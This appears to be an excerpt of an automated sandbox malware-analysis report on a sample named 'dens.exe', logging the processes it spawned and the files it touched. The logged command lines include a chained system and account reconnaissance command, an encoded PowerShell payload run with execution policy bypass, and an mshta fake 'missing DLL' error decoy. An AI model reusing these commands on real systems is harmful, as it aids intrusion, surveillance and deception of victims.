            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblagu
abgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgao
ag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [encoded payload omitted]
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [encoded payload omitted]
            Source: C:\Users\user\Desktop\dens.exe Code function: 0_2_00007FF62C119570 cpuid 0_2_00007FF62C119570
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\attrs-24.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography-43.0.1.dist-info\license_files VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\autocommand-2.2.2.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\backports.tarfile-1.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\importlib_resources-6.4.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\inflect-7.3.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco.context-5.3.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco.functools-4.0.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco.text-3.12.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\more_itertools-10.3.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\packaging-24.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\platformdirs-4.2.2.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\tomli-2.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\tomli-2.0.1.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typing_extensions-4.12.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typing_extensions-4.12.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typing_extensions-4.12.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\typing_extensions-4.12.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\zipp-3.19.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\zipp-3.19.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\zipp-3.19.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\zipp-3.19.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\zipp-3.19.2.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\ucrtbase.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
